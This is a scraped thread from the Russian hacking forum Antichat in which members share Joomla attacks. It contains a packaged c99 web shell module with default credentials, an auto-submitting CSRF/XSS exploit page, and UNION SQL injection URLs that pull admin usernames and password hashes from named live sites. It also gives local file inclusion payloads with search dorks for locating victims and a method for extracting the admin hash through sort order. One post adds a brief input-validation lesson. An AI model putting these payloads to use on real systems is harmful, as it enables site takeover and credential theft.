Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
13.12.2009, 22:01
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Сёдняшний сплойт:
http://www.exploit-db.com/exploits/10407
От автора SOA Crew
Единственное непонятно куда он там данные то выводит, на главной их что то не видно ;(
|
|
|
06.01.2010, 15:59
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Бесполезная бага в Joomla или "логическая sql-инъекция"
Взглянем на скрипт \joomla\administrator\components\com_users\views\u sers\view.html.php.
Там есть такой участок:
PHP код:
$query = 'SELECT a.*, g.name AS groupname'
. ' FROM #__users AS a'
. ' INNER JOIN #__core_acl_aro AS aro ON aro.value = a.id'
. ' INNER JOIN #__core_acl_groups_aro_map AS gm ON gm.aro_id = aro.id'
. ' INNER JOIN #__core_acl_aro_groups AS g ON g.id = gm.group_id'
. $filter
. $where
. ' GROUP BY a.id'
. $orderby
;
Выше определена переменная $orderby:
PHP код:
$orderby = ' ORDER BY '. $filter_order .' '. $filter_order_Dir;
Причём переменные $filter_order и $filter_order_Dir определяются пользователем.
В админке во всех секциях есть hidden-поля в формах с этими переменными.
Что ж, подставим левые значения, например, asd и fgh соответственно: http://localhost/joomla/administrator/index.php?option=com_content&filter_order=asd&filt er_order_Dir=fgh
Получаем следующий ответ:
Код:
500 - An error has occurred!
DB function failed with error number 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'fgh, section_name, cc.title, c.ordering LIMIT 0, 20' at line 1 SQL=SELECT c.*, g.name AS groupname, cc.title AS name, u.name AS editor, f.content_id AS frontpage, s.title AS section_name, v.name AS author FROM jos_content AS c LEFT JOIN jos_categories AS cc ON cc.id = c.catid LEFT JOIN jos_sections AS s ON s.id = c.sectionid LEFT JOIN jos_groups AS g ON g.id = c.access LEFT JOIN jos_users AS u ON u.id = c.checked_out LEFT JOIN jos_users AS v ON v.id = c.created_by LEFT JOIN jos_content_frontpage AS f ON f.content_id = c.id WHERE c.state != -2 ORDER BY asd fgh, section_name, cc.title, c.ordering LIMIT 0, 20
Как мы видим, наши значения попали в sql-запрос. Но они всё же фильтруются - большая часть спецзнаков не пропускается, разрешены, например, точки, поскольку они нужны в нормальном запросе.
Казалось бы, из такой "sql-инъекции" ничего кроме префикса таблиц не выжать.
Однако, просмотрим админку и увидим страницу управления пользователями: http://localhost/joomla/administrator/index.php?option=com_users
Вышеупомянутые параметры в этой секции используются для сортировки пользователей (подставляются в ORDER BY).
И тут внезапно: а что если отсортировать их по паролю?
Ну: http://localhost/joomla/administrator/index.php?option=com_users&filter_order=a.password
Теперь можно создать пользователя, сделать ему какой-то пароль, затем отсортировать на этой странице, и мы увидим, где по алфавиту находится хеш админа - выше или ниже хеша нашего пользователя.
Далее можно организовать бинарный поиск и вытащить весь хеш админа.
Конец.
P.S. Разумеется, эта бага в Joomla совершенно ничего не даёт, поскольку она в админке, а xsrf там нет. Я написал про неё лишь для того, чтобы показать саму возможность подобных атак. Такая ситуация может возникнуть, например, в форумном движке, где список пользователей может быть доступен каждому. Мораль: переменные надо не только фильтровать на спецсимволы, но и проверять введённые данные на логическую совместимость.
P.P.S. В vbulletin, например, скрипт memberlist.php ограничивает параметры для сортировки:
PHP код:
switch ($sortfield)
{
case 'username':
$sqlsort = 'user.username';
break;
case 'joindate':
$sqlsort = 'user.joindate';
break;
case 'posts':
$sqlsort = 'user.posts';
break;
case 'lastvisit':
$sqlsort = 'lastvisittime';
break;
case 'reputation':
$sqlsort = iif($show['reputationcol'], 'reputationscore', 'user.username');
$secondarysortsql = ', user.username';
break;
case 'age':
if ($show['agecol'])
{
$sqlsort = 'agesort';
$secondarysortsql = ', user.username';
}
else
{
$sqlsort = 'user.username';
}
break;
default:
$sqlsort = 'user.username';
$sortfield = 'username';
}
Последний раз редактировалось Root-access; 06.01.2010 в 16:08..
|
|
|
|
07.01.2010, 13:17
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404
Репутация:
564
|
|
Модуль шелла для joomla
Может кому нить пригодится, сам много раз сталкивался с проблемами заливки шелла с админки из за кривых привилегии,
вот сделал простенький модуль mod_joomla_c99shell
1) Заходим в "Менеджер расширений" выбираем "Загрузить файл пакета" загружаем наш файл mod_joomla_c99shell.zip
2) После удачного инсталла переходим в папку http://site.ru/modules/mod_joomla_c99shell/mod_joomla_c99shell.php
3) Заходим на наш шелл логин fixer пароль antichat (после можете поменять все там на свое усмотрение)
Модуль шелла можете скачать тут тестировал на Joomla 1.5.14
Последний раз редактировалось shell_c0de; 07.01.2010 в 13:20..
|
|
|
|
08.01.2010, 02:23
|
|
Участник форума
Регистрация: 18.08.2008
Сообщений: 159
Провел на форуме:
750247
Репутация:
92
|
|
Список уязвимых плагинов
Последний раз редактировалось 4p3; 08.01.2010 в 02:44..
|
|
|
|
09.01.2010, 16:11
|
|
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210
Репутация:
2017
|
|
Файл : com_oscommerce
Уязвимость : LFI
сорри исходники так и не нашел
Особая фаза луны : Magic_qoutes = off
https://www.naadac.org/index.php?option=com_oscommerce&osMod=product_info '
Warning: include(components/com_oscommerce/product_info\'.php) [function.include]: failed to open stream: No such file or directory in /www/naadac.org/html/components/com_oscommerce/oscommerce.php(2) : eval()'d code(1) : eval()'d code(1) : eval()'d code on line 68
Dopk:
inurl:index.php?option=com_oscommerce
Ам, вроде не боян, если баян ,то удалите..
__________________
В сырых могилах Второй Мировой
Солдатам снятся цветные сны.
Их кости порой видны под первой травой,
Когда сойдет снег в начале весны.
Славяне тоже сражались в отрядах СС
За чистоту арийской крови.
Теперь они дремлют за чертою небес,
Но снова встанут на бой, лишь позови.
|
|
|
|
11.01.2010, 01:09
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
From ROA
Joomla XSS
XSS присутствует в компоненте com_admin.
Уязвимая строчка в \joomla\administrator\components\com_admin\admin.a dmin.html.php:
PHP код:
<input type="text" name="helpsearch" value="<?php echo $helpsearch;?>" class="inputbox" />
Заходим на http://localhost/joomla/administrator/index.php?option=com_admin&task=help.
Там есть поле для поиска. Текст из него не htmlspecialchar-ится, но какая-то странная фильтрация есть.
Почему-то, если набрать, скажем, так: "><img src="blabla....., этот тег обрезается, то есть написать новый тег у меня не получилось.
Что ж, приходится обходиться свойствами тега <input>.
XSS в post-параметре админки, поэтому она не работала бы без XSRF.
Собственно, сплойт:
Код:
<html>
<body>
<form action="http://localhost/joomla/administrator/index.php?option=com_admin&task=help" method="post" name="adminForm">
<input class="text_area" type="hidden" name="option" value="com_admin" />
<input type="text" name="helpsearch" value='" size="1000" onmouseover="alert()' class="inputbox" />
<input type="submit" value="Go" class="button" id="xsrf"/>
<input type="hidden" name="task" value="help" />
</form>
<script>document.getElementById("xsrf").click();</script>
</body>
</html>
В чём суть: я сделал так, чтобы поле поиска стало длинным, так что, если админ проведёт мышкой по экрану, сработает xss. Вероятность этого весьма велика. |
|
|
|
12.03.2010, 01:18
|
|
Reservists Of Antichat - Level 6
Регистрация: 14.11.2007
Сообщений: 177
Провел на форуме:
1246854
Репутация:
622
|
|
Уязвимость: SQL-Inj
Компонент: com_ezautos (проверял на v3.2.0)
Dopk: inurl:com_ezautos inurl: option
Файл: /components/com_ezautos/ezautos.php
PHP код:
switch ($task){
case 'helpers':
helpers($_REQUEST['id']);
break;
}
.......
function helpers($id){
global $database, $mainframe;
switch ($id) {
case '1':
if(isset($_GET['firstCode'])){
$query = "SELECT * FROM #__ezautos_model WHERE published='1' AND makeid=".$_GET['firstCode']." ORDER BY model DESC";
$database->setQuery( $query );
$rows = $database->loadObjectList();
echo "obj.options[obj.options.length] = new Option('Select Model','0');\n";
foreach ($rows as $row){
echo "obj.options[obj.options.length] = new Option('".$row->model."','".$row->moid."');\n";
}
}
break;
}
}
http://www.sfauto.ru/index.php?option=com_ezautos&Itemid=49&id=1&task=h elpers&firstCode=1+and+0+union+select+1,2,concat(u sername,0x3a,password),4,5,6,7+from+%23__users+whe re+gid=25+or+gid=24+and+block<>1-- |
|
|
|
02.04.2010, 02:24
|
|
Познающий
Регистрация: 30.03.2008
Сообщений: 64
Провел на форуме:
388255
Репутация:
15
|
|
SQL Injection в стандартных компонентах
1) Joomla Component com_wrapper
+================================================= ==================================+
./SEC-R1Z _ __ _ _ _ _ ___ _ _ _ _ __ _ _ _ _ _
/ /_ _ _ _ / _ _\/ _ _ /\ \< |/_ _ _ _ /
\ \_ _ _ _/ /___ / / __ | |) / | | / /
\_ _ _ _/ /___ / / | __ || / | | / /
_______\ \_ _ \ \2_0_0_9 | \ | | / /____
/_ _ _ _ _\ _ _ _/\ _ _ _ / |__|\ __\ |__|/_ _ _ _ _\ R.I.P MichaelJackson !!!!!
+================================================= ==================================+
[?] ~ Note : sEc-r1z CrEw# r0x !
================================================== ============================
[?] Joomla Component com_wrapper SQL Blind Injection Vulnerability
================================================== ============================
[?] My home: [ http://sec-r1z.com ]
[?] Script: [ Joomla Component com_wrapper ]
[?] Language: [ PHP ]
[?] Founder: [ ./Red-D3v1L ]
[?] Gr44tz to: [ sec-r1z# Crew - Hackteach Team - My L0ve ~A~ ]
[?] Fuck To : [ Zombie_KsA << big big big L4m3r ]
################################################## ######################
===[ Exploit SQL ]===
[»]SQL : [Path]/index.php?option=com_wrapper&view=wrapper&Itemid==[inj3ct C0dE]
[»]dem0:
This True :
http://www.doubleclick.ps/index.php?option=com_wrapper&view=wrapper&Itemid=9 2%20and%201=0
This False :
http://www.doubleclick.ps/index.php?option=com_wrapper&view=wrapper&Itemid=9 2%20and%201=1
================================================== ============================
#sEc-r1z.com Str1kEz y0u !
2) com_weblinks
################################################## ###############
# Securitylab.ir
################################################## ###############
# Application Info:
# Name: Joomla Component com_weblinks
################################################## ###############
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
################################################## ###############
Vulnerability:
http://site.com/index.php?option=com_weblinks&task=view&catid=8&id =-1 UNION SELECT 1,2,3,4,5
################################################## ###############
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.securitylab.ir
# Contacts: admin[at]securitylab.ir & whh_iran[AT]yahoo.com
################################################## #################
3) com_xmap
################################################## ###############
# Securitylab.ir
################################################## ###############
# Application Info:
# Name: Joomla Component com_xmap
################################################## ###############
# Vulnerability Info:
# Type: Sql Injection
# Risk: Medium
################################################## ###############
Vulnerability:
http://site.com/index.php?option=com_xmap&sitemap=2&Itemid=18-1 UNION SELECT 1,2,3,version(),5,6,7,8--
################################################## ###############
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.securitylab.ir
|
|
|
|
08.04.2010, 14:43
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Joomla XSS
XSS наподобии той, что в посте #103, но удобнее:
Код:
http://localhost/administrator/index.php?option=com_content&search=%22%20size=100%20onmouseover=alert()%20bla
Никаких CSRF и post не нужно |
|
|
|
11.04.2010, 18:07
|
|
Познающий
Регистрация: 23.08.2008
Сообщений: 95
Провел на форуме:
585487
Репутация:
45
|
|
товарищи, кто подскажет как узнать полную версию Joomla? вариант с configuration.php-dist не прокатит.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
